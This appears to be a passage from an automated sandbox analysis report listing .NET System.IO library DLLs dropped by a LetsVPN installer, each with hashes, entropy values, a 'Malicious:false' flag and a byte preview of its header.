                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...@..Y.........." ..0..............)... ...@....... ....................................@..................................)..O....@.................. ....`......h(............................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................)......H.......P .......................'......................................BSJB............v4.0.30319......l...0...#~..........#Strings....x.......#US.|.......#GUID...........#Blob......................3......................................................m.....A.{.........U.................T...........#.....l...........>.....'...................u.....u.....u...).u...1.u...9.u...A.u...I.u...Q.u...Y.u...a.u...i.u...q.u.......................#.....+.....3.....;.....C.1...K.Q...S.

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\System.IO.Compression.ZipFile.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):16928
                                                                                                                                                                                                  Entropy (8bit):6.908181305951868
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:gYWsmWShqWOHlLf2KQcvBZ9dWS+ShjmM6IGBkSV:g2uq3b2KZBZCS+ST6nkq
                                                                                                                                                                                                  MD5:07F83DA30A4155730B722D028D2E7A5D
                                                                                                                                                                                                  SHA1:DA2085605B64741D85F5EDEF8D4E45C3D0A24AEA
                                                                                                                                                                                                  SHA-256:ACA4744E64C8EDAB708CD3193B4315C937CEEE3FC82CC7C35EF195E229EB8DFC
                                                                                                                                                                                                  SHA-512:0642BDF49C4CC0EA90E79770B64D5007A3CE8A37D9F7A69E1AD7522C43F0D7DFEEC365B1D525470442A6A24000F170F6BC9B1DBAA0FD9BE192B15F7ABDF6D3C4
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...@..Y.........." ..0.............*(... ...@....... ...............................h....@..................................'..O....@..@............... ....`.......&............................................... ............... ..H............text...0.... ...................... ..`.rsrc...@....@......................@..@.reloc.......`......................@..B.................(......H.......P ...................... &......................................BSJB............v4.0.30319......l.......#~......D...#Strings....8.......#US.<.......#GUID...L.......#Blob......................3......................................................z.....N.....".....b.................a...........0.....y...........K.....4...................................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.........:.....C.....b...#.k...+.k...3.k...;.....C.....K.....S.

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\System.IO.Compression.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):106528
                                                                                                                                                                                                  Entropy (8bit):6.4118107859279405
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:1536:Jvc/U5yNq2oS4Zd0LE3YigSFvhoZO2K3aAYH2TfXmNoJXv3qKe/mvW:Fgk1tiLMYiDFvxqrWDWNoJXv6/AW
                                                                                                                                                                                                  MD5:CF91C18B32DA597C9E15105999487628
                                                                                                                                                                                                  SHA1:C863AC3BAB1FB4EB227E5722D0455F9A3B131B35
                                                                                                                                                                                                  SHA-256:4B34A0DEB1F888A8B48B39C6B4073B197344FB9B56DA1887767569937AA3B488
                                                                                                                                                                                                  SHA-512:7518606F44E43108C5666C09845EC5B5FE99BC84FFFD3DC6A830B840DBA74950FFD73609DAC0F6AE61746EFD691866B805A88B9B30968C9E725C39434D7A622F
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......Z.........." ..0..d...........W... ........... ..............................v.....@.................................5W..O....................r.. ............V............................................... ............... ..H............text....b... ...d.................. ..`.rsrc................f..............@..@.reloc...............p..............@..B................iW......H........................9.......V......................................j~....%-.&(I...s....%.....*..*...0..$.........(.....o.......&...,....o....,..*.*..................,!(....,..r...p.(....(....*..(....*.*.(....,.r...p......%...%...(....*..(....*.(....,.r...p......%...%...%...(....*...(....*.(....,!r...p......%...%...%...%...(....*....(....*2r...p.(....*2r7..p.(....*2rs..p.(....*2r...p.(....*2r...p.(....*2r...p.(....*2r=..p.(....*2r_..p.(....*2r...p.(....*2r...p.(....*2r...

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\System.IO.FileSystem.AccessControl.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):31264
                                                                                                                                                                                                  Entropy (8bit):6.48384033148274
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:768:+CN9VYp/OiRcnZIfk8P/q3b2KZBZQCS+ST6nkK:+Q9ycnn0S3qKP/mc
                                                                                                                                                                                                  MD5:F41DE27679C17CAA34164449186B0D6C
                                                                                                                                                                                                  SHA1:5D911884D1D162BEAD6D5A3921620799D8A4A0B8
                                                                                                                                                                                                  SHA-256:A48D066FA2F1861EB5218A2149FF99DE13CC431699CCC5B476A9E3C270F9B7B9
                                                                                                                                                                                                  SHA-512:92C64376C72BE45DA44E29F2638BC69361D9C3DA7079CAFF3924DBD106E35EE1DF4D833F94876F2E17A8904544F4A7D30E707529B67454E7DA5166492F0ACB34
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...._............" ..0..B...........`... ........... ....................................`.................................t`..O....................L.. ...........l_..T............................................ ............... ..H............text....@... ...B.................. ..`.rsrc................D..............@..@.reloc...............J..............@..B.................`......H........&..t)...........P.......^........................................(....*^.(.......(...%...}....*:.(......}....*:.(......}....*:.(......}....*.~....*.0..1.......(....,..%-.&.*..(.....o.......&...,...o....,..*.*....................(....,.r...p......%...%...(....*..(....*.(....,.r...p......%...%...%...(....*...(....*.(....,!r...p......%...%...%...%...(....*....(....*..,&(....,..r...pr...p.(....(....*..(....*.*.(....,.r...p......%...%...(....*...(....*.(....,.r...p......%

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\System.IO.FileSystem.DriveInfo.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):16928
                                                                                                                                                                                                  Entropy (8bit):6.965595445677437
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:IKcuz1W1cWthqWOHlLf2KQcvBZ9KOVS+ShjmM6IGBkSq9:Iu81q3b2KZBZ3VS+ST6nkz
                                                                                                                                                                                                  MD5:F39321A5CFD4B2B4DF5B7297002CE169
                                                                                                                                                                                                  SHA1:9E9B762DE62DCE2854455BC9679BAC99C542223B
                                                                                                                                                                                                  SHA-256:7CD078C1EA5D6FD8225084858E2D09F9F6F4DEC433A8930ACBCD2C343D2DAD12
                                                                                                                                                                                                  SHA-512:0649CFAB684C6BC7FDD392033C0DA94D7646ABF9853BFBBBF1CCCD840A98996AB44E4375DF460522A4343A0B5AD30FB9FA93504F75FFEB5DBF2377AF76E9BDAA
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...@..Y.........." ..0..............(... ...@....... ....................................@..................................(..O....@..P............... ....`......H'............................................... ............... ..H............text........ ...................... ..`.rsrc...P....@......................@..@.reloc.......`......................@..B.................(......H.......P ..x....................&......................................BSJB............v4.0.30319......l.......#~......H...#Strings....L.......#US.P.......#GUID...`.......#Blob......................3......................................................p.....D.....9.....X.................W...........&.....o...........A.....*...................................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.........................#.....+.....3.....;. ...C.;...K.[...S.

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\System.IO.FileSystem.Primitives.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):16928
                                                                                                                                                                                                  Entropy (8bit):6.969722484889954
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:G+SWikWghqWOHlLf2KQcvBZ9e+dS+ShjmM6IGBkStci5:G+eKq3b2KZBZDdS+ST6nkI
                                                                                                                                                                                                  MD5:F934333E05C58E175207663C777901CC
                                                                                                                                                                                                  SHA1:2224BF0028BD1F061823F9730ACB82EF91A59D30
                                                                                                                                                                                                  SHA-256:26033A1C20A6BC7C8C69DE577B9F3B47249F6EE7B28747A972E160810E4A10CA
                                                                                                                                                                                                  SHA-512:799B511DB5784587B67A1551CF1B24A9F8DC37AD2D0D1378D0A89241F44821ED3F47E22118EE9427EF5E766F79F64C41C64F6C43F1F60FC58D7669E2738EF59A
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...@..Y.........." ..0..............(... ...@....... ...............................b....@..................................(..O....@..P............... ....`......d'............................................... ............... ..H............text........ ...................... ..`.rsrc...P....@......................@..@.reloc.......`......................@..B.................(......H.......P .......................&......................................BSJB............v4.0.30319......l.......#~......X...#Strings....h.......#US.l.......#GUID...|.......#Blob......................3......................................................y.....M...........a.................`.........../.....x...........J.....3...................................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.........................#.....+.....3.....;.!...C.<...K.\...S.

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\System.IO.FileSystem.Watcher.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):16928
                                                                                                                                                                                                  Entropy (8bit):7.005950112883477
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:piAWzgWj6hqWOHlLf2KQcvBZ9JOkXS+ShjmM6IGBkSF8b:wtkq3b2KZBZukS+ST6nkIU
                                                                                                                                                                                                  MD5:DDE1CE18B4DB03BE26C9DC5D1364B9ED
                                                                                                                                                                                                  SHA1:CA068FE5A6187CED9DC64C2F861D405A78D498BA
                                                                                                                                                                                                  SHA-256:67908E6B6AEC9096E22708584061BCE00FC0470EE8BE85754533F32631C49172
                                                                                                                                                                                                  SHA-512:C28EB8E74C6A730B94FEF3667EDFEB37C22F2B307882589020A33B290ED3BF35CC120677A6D7AA1FD27F3380381651A4948B160C474C473F4C8C0B62A6281F37
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...@..Y.........." ..0..............)... ...@....... ..............................@.....@.................................p)..O....@..@............... ....`......8(............................................... ............... ..H............text........ ...................... ..`.rsrc...@....@......................@..@.reloc.......`......................@..B.................)......H.......P ..h....................'......................................BSJB............v4.0.30319......l.......#~..d.......#Strings....@.......#US.D.......#GUID...T.......#Blob......................3..................................................C...f.C...:.0...c.....N.................M.................e...........7..... ...................*.....*.....*...).*...1.*...9.*...A.*...I.*...Q.*...Y.*...a.*...i.*...q.*.......................#.....+.....3.....;.....C.9...K.Y...S.

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\System.IO.FileSystem.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):16928
                                                                                                                                                                                                  Entropy (8bit):6.970704080069797
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:mBLRWbYWAhqWOHlLf2KQcvBZ9LAuDS+ShjmM6IGBkSHN:mB2Oq3b2KZBZTS+ST6nkgN
                                                                                                                                                                                                  MD5:8C374646D6CFE62A64F99AC6883D769C
                                                                                                                                                                                                  SHA1:CC08A69E0618A534B15CA59F90CBD775FC286EB4
                                                                                                                                                                                                  SHA-256:1B1FBF9870296C136AB3EAD15975B2F5B764838FB576A24E002BBCD68B0C1AC7
                                                                                                                                                                                                  SHA-512:AEDA2CD3E7F98B663EEF05B8D160B66E7F0BFEF9628631DB3144241739BB2079B207FCA040087ED76970425F05A61AD74E8C34C284B0628476527AAED8B4A499
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...@..Y.........." ..0.............b)... ...@....... ....................................@..................................)..O....@.................. ....`.......'............................................... ............... ..H............text...h.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................D)......H.......P ......................X'......................................BSJB............v4.0.30319......l.......#~..X.......#Strings............#US.........#GUID...........#Blob......................3................................................../...z./...N.....O.....b.................a...........0.....y...........K.....4...................................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.........................#.....+.....3.....;.....C.1...K.Q...S.

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\System.IO.IsolatedStorage.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):16928
                                                                                                                                                                                                  Entropy (8bit):6.956841147765326
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:iHW4/Wv7hqWOHlLf2KQcvBZ95YuS+ShjmM6IGBkSw:irGtq3b2KZBZwuS+ST6nk3
                                                                                                                                                                                                  MD5:121900FAF0866DA1543E360231896FB5
                                                                                                                                                                                                  SHA1:D2511193D20B2FC38A3CEAA1E6076025AEBDC26B
                                                                                                                                                                                                  SHA-256:BA84F39643E8D9047DE7659D4F754D92D945D89F22B805B0732862CAF25AD315
                                                                                                                                                                                                  SHA-512:2F0B33A4E792CD53BCCA605BF5BB3507ABB6755622D8F51948F03AE201695AE2689CD78DB1E8BDDED596E997653F6966C8A54D52F5085EA25A27C7871615FBC8
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...A..Y.........." ..0..............(... ...@....... ....................................@..................................(..O....@.. ............... ....`......X'............................................... ............... ..H............text........ ...................... ..`.rsrc... ....@......................@..@.reloc.......`......................@..B.................(......H.......P .......................&......................................BSJB............v4.0.30319......l.......#~......\...#Strings....`.......#US.d.......#GUID...t.......#Blob......................3..................................................+.....+...^.....K.....r.................q.....'.....@.................[.....D...................................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.........................#.....+.....3.....;.....C.6...K.V...S.

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\System.IO.MemoryMappedFiles.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):16928
                                                                                                                                                                                                  Entropy (8bit):7.010818325491102
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:4vk7hWmCWthqWOHlLf2KQcvBZ9kzS+ShjmM6IGBkSZ:4s7/Pq3b2KZBZWS+ST6nkq
                                                                                                                                                                                                  MD5:FC146383703882794B07AE23F5A7A66E
                                                                                                                                                                                                  SHA1:32ECFBCB81732FA23DAA8E3259D1DAB2BB5F82AB
                                                                                                                                                                                                  SHA-256:56F7B1883AB592EA9E8505E62AA96E58C4F5E1437BCC4CFC53B975AE945EF646
                                                                                                                                                                                                  SHA-512:A3E49D21BC39B6C49B79DB85F2C09A7CB3509021D51EFD4A46A08D1C8A111CF997F8461D9BFD944AB4DF5B7EEFBD6187CCB7242831E2D461F2E5C75E7BB82EAC
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...A..Y.........." ..0..............)... ...@....... ...............................4....@.................................h)..O....@..0............... ....`......0(............................................... ............... ..H............text........ ...................... ..`.rsrc...0....@......................@..@.reloc.......`......................@..B.................)......H.......P ..`....................'......................................BSJB............v4.0.30319......l.......#~..H.......#Strings....8.......#US.<.......#GUID...L.......#Blob......................3................................................ .C.....C...w.0...c.............................@.....Y.................t.....]...................*.....*.....*...).*...1.*...9.*...A.*...I.*...Q.*...Y.*...a.*...i.*...q.*.......................#.....+.....3.....;.....C.8...K.X...S.

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\System.IO.Packaging.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):48672
                                                                                                                                                                                                  Entropy (8bit):5.996358920818446
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:768:2xua7db+smzMnSzBt++0YfTF61O+luv5tywq3b2KZBZIS+ST6nkv:2xH7ssKugt+++1luv5tyD3qK2/mB
                                                                                                                                                                                                  MD5:D7EC72C65DE0FFDD7722008425F26B08
                                                                                                                                                                                                  SHA1:38BEC24A3EA5DE5E66C04B86FC532FB1BB9C6E58
                                                                                                                                                                                                  SHA-256:B7DCC93166B69CEBCBE23E459B1307FF828C8DE7909B1C762A403A3F5AC957D7
                                                                                                                                                                                                  SHA-512:B8BEA46B2DCFF31B3867B1642558A2B6B04B832ADB0E8B356FE9A5674B011A47FB411D3075677AC088AB13B4A34166B9B000348F81ED24A12CA61A7C6C1F2ACC
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...)1............" ..0.................. ........... ...............................h....`.................................S...O....................... ...........t...T............................................ ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H.......`(...D...........l...6...........................................~....*..0..........(....,..*..(.....o.......&...*...................0...........(.......(....-..,..*.*.(....,.r...p......%...%...(....*..(....*.(....,.r...p......%...%...%...(....*...(....*.(....,!r...p......%...%...%...%...(....*....(....*..,&(....,..r...pr...p.(....(....*..(....*.*.(....,.r...p......%...%...(....*...(....*.(....,.r...p......%...%...%...(....*....(....*.(....,"r...p......%...%...%...%..

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\System.IO.Pipes.AccessControl.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):21536
                                                                                                                                                                                                  Entropy (8bit):6.685743907435627
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:JANJdesEvbDYUgmpWrxWNPfWqxWfPthqWOHlLf2KQcvBZ9faGS+ShjmM6IGBkSah:sclTD/yod2rq3b2KZBZrS+ST6nkFh
                                                                                                                                                                                                  MD5:9D42E9C41B33562AFEA35DE7C804C754
                                                                                                                                                                                                  SHA1:006F54589A5F69913032B66152AE6E82FA9DDBC2
                                                                                                                                                                                                  SHA-256:88572FD2F316A9B3DB0C7ED15F46BF599CC478E0180D3CBFF461F2F3C116B419
                                                                                                                                                                                                  SHA-512:872AC5AFF634EFE5A40B3B9F96E3E2391A553A7D696477602829478E4B62C80D6CA7B54E14708A580CC96B2F2A73657B53FB8443A8C211DC2EB6DA92EB7932FC
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....:.[.........." ..0.............Z5... ...@....... ....................................@..................................5..O....@..P............&.. ....`......T4............................................... ............... ..H............text...`.... ...................... ..`.rsrc...P....@......................@..@.reloc.......`.......$..............@..B................;5......H........!...............0..(....3......................................j~....%-.&(....s....%.....*..*...0..$.........(.....o.......&...,....o....,..*.*..................,!(....,..r...p.(....(....*..(....*.*.(....,.r...p......%...%...(....*..(....*.(....,.r...p......%...%...%...(....*...(....*.(....,!r...p......%...%...%...%...(....*....(....*.~....*2r...p.(....*2ra..p.(....*2r...p.(....*2r...p.(....*2r...p.(....*B.....(.........*..o....*"..o....*.BSJB............v4.0.30319..

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\System.IO.Pipes.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):16928
                                                                                                                                                                                                  Entropy (8bit):6.980062550753211
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:iGMWCUWDhqWOHlLf2KQcvBZ9koEcobKS+ShjmM6IGBkSDR:i3zq3b2KZBZdE5KS+ST6nkER
                                                                                                                                                                                                  MD5:30A53C66C4F7DBA85CEF0AD632D56D1A
                                                                                                                                                                                                  SHA1:1FC2132D66E81FAC944C924C70BC7196728742BB
                                                                                                                                                                                                  SHA-256:E435FC7019E698A9EA77EF2D8C857E206A67F61EA26D54223EE5700A95D85983
                                                                                                                                                                                                  SHA-512:25D9DF05350FE3A03B8C4FBA186E62930CE1943F5AA52A77C60767ACA5B2AD7B99130950149F62410123E704582154EE958EA54AF5A31ED3DE31F2010D39D702
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...A..Y.........." ..0..............)... ...@....... ...............................-....@.................................@)..O....@.................. ....`.......(............................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................t)......H.......P ..8....................'......................................BSJB............v4.0.30319......l.......#~..X.......#Strings............#US. .......#GUID...0.......#Blob......................3..................................................].....]...T.J...}.....h.$.....$.....$...g.$.....$...6.$.....$.....$...Q.....:.$.................D.....D.....D...).D...1.D...9.D...A.D...I.D...Q.D...Y.D...a.D...i.D...q.D.......................#.....+.....3.....;.....C.,...K.L...S.

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\System.IO.Ports.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):35872
                                                                                                                                                                                                  Entropy (8bit):6.320710151085161
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:768:k44bN5hwABzKGUn11fF+1WSq3b2KZBZGS+ST6nkNiT:k5bLhLBzcn1gW93qKA/meT
                                                                                                                                                                                                  MD5:A620A68A1816FDE03C3D7654B8CDE81D
                                                                                                                                                                                                  SHA1:DD84D590F2C2D4D6663B705669E6DA477FFD9284
                                                                                                                                                                                                  SHA-256:38A0922D0F78A6CC5C31A28994ECFA1956E280AA76F24B0D52E4863B08ECA47C
                                                                                                                                                                                                  SHA-512:1FFEF524BDDF5E9F7BDB7489F5EAC5933B305F080303BD315B779DD42FD578CA7CB353ED4C29F41244BE23E4FC89AFE329A27240DFC0087ED881431E1C52D7A7
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................." ..0..T...........s... ........... ..............................y.....`..................................r..O....................^.. ............q..T............................................ ............... ..H............text....S... ...T.................. ..`.rsrc................V..............@..@.reloc...............\..............@..B.................r......H........&...............U..X...`q.......................................~....*..0..........(....,..*..(.....o.......&...*...................0...........(.......(....-..,..*.*.(....,.r...p......%...%...(....*..(....*.(....,.r...p......%...%...%...(....*...(....*.(....,!r...p......%...%...%...%...(....*....(....*..,&(....,..r...pr...p.(....(....*..(....*.*.(....,.r...p......%...%...(....*...(....*.(....,.r...p......%...%...%...(....*....(....*.(....,"r...p......%...%...%...%..

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\System.IO.UnmanagedMemoryStream.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):16928
                                                                                                                                                                                                  Entropy (8bit):6.962051100154249
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:OBhwI7WSQWMhqWOHlLf2KQcvBZ9ZNdS+ShjmM6IGBkSh:ODwIBCq3b2KZBZbS+ST6nkK
                                                                                                                                                                                                  MD5:62AB75D88CC45203A838FA86CAAF189D
                                                                                                                                                                                                  SHA1:2F5A9349B011E54677C30ADD9DDE2E11CF0088D9
                                                                                                                                                                                                  SHA-256:430C25AA7A3D839D77BDAFCC31DDB85670C3E5A6CF7DBD59361A7262466C511E
                                                                                                                                                                                                  SHA-512:0132E274C13147D5B4767345F223882F23D2A4FCB69D708728EF7E8ACF6E2A67814B76F5E508384B15FDA94C2636D98C2C101B5C756459CE611BF815F793E278
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...A..Y.........." ..0..............(... ...@....... ....................................@.................................l(..O....@..P............... ....`......4'............................................... ............... ..H............text........ ...................... ..`.rsrc...P....@......................@..@.reloc.......`......................@..B.................(......H.......P ..d....................&......................................BSJB............v4.0.30319......l.......#~......D...#Strings....8.......#US.<.......#GUID...L.......#Blob......................3......................................................f.....:.....2.....N.................M.................e...........7..... ...................................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.........................#.....+.....3.....;.!...C.<...K.\...S.

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\System.IO.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):16928
                                                                                                                                                                                                  Entropy (8bit):6.978691087340885
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:6yvPRW4lWnhqWOHlLf2KQcvBZ99LZ5S+ShjmM6IGBkSks:/396q3b2KZBZXzS+ST6nk2
                                                                                                                                                                                                  MD5:468045C4B51E0F07C15C5F469F6A362C
                                                                                                                                                                                                  SHA1:DBCF255A9A6C3E2B733988664D64D05373C967BD
                                                                                                                                                                                                  SHA-256:E9DEC41A2F095B3F448CEAE1CBB3D782AEDADBB6E941D0AF7984523E253F0BBD
                                                                                                                                                                                                  SHA-512:97BCC2719C9BECAF1A9BFF8CD597F56A1AE6C148C19DDFFFCD3819BA3B97E6107FFD7D8F76F81E29542DA9BFE73DC36E8DAA42CB51E55A74B6644E828F7856FE
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...@..Y.........." ..0..............)... ...@....... ..............................:.....@..................................)..O....@.................. ....`......l(............................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................)......H.......P .......................'......................................BSJB............v4.0.30319......l...L...#~..........#Strings............#US.........#GUID...........#Blob......................3......................................................f.....:...........N.................M.................e...........7..... ...................................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.........................#.....+.....3.....;.....C.&...K.F...S.

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\System.Linq.Expressions.dll

                                                                                                                                                                                                  Download File
